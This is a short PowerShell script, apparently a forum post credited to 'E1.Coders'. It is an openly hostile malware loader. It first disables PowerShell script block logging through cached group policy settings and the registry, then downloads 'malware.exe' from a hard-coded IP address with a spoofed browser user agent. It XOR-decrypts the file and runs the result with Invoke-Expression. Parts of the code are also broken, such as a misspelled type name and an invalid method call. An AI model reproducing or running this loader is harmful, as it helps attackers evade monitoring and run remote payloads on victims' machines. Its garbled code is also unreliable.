[B]#Code By E1.Coders[/B]
if ($PSVersionTable.PSVersion.Major -ge 3) {
    $utils = [System.Management.Automation.Utils]
    $cachedGroupPolicySettings = $utils::GetFieldValue([System.Management.Automination.Utils], "cachedGroupPolicySettings")
    if ($cachedGroupPolicySettings) {
        if ($cachedGroupPolicySettings.ContainsKey("EnableScriptBlockLogging")) {
            $cachedGroupPolicySettings["EnableScriptBlockLogging"] = 0
            $cachedGroupPolicySettings["EnableScriptBlockInvocationLogging"] = 0
        }
        Set-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows\PowerShell" -Name "ScriptBlockLogging" -Value $cachedGroupPolicySettings["EnableScriptBlockLogging"]
    }
    $userAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
    $payloadUrl = "http://46.246.38.234/malware.exe"
    $payloadPath = "$env:TEMP\malware.exe"
    Invoke-WebRequest -Uri $payloadUrl -OutFile $payloadPath -UserAgent $userAgent
    $key = 0x42
    $payloadBytes = [System.IO.File]::ReadAllBytes($payloadPath)
    $decryptedPayloadBytes = $payloadBytes | ForEach-Object { $_ -bxor $key }
    $decryptedPayload = [System.Text.Encoding]::UTF8.GetString($decryptedPayloadBytes)
    Invoke-Expression $decryptedPayload
} else {
    Write-Host "PowerShell version 3 or later is required to run this script."
}​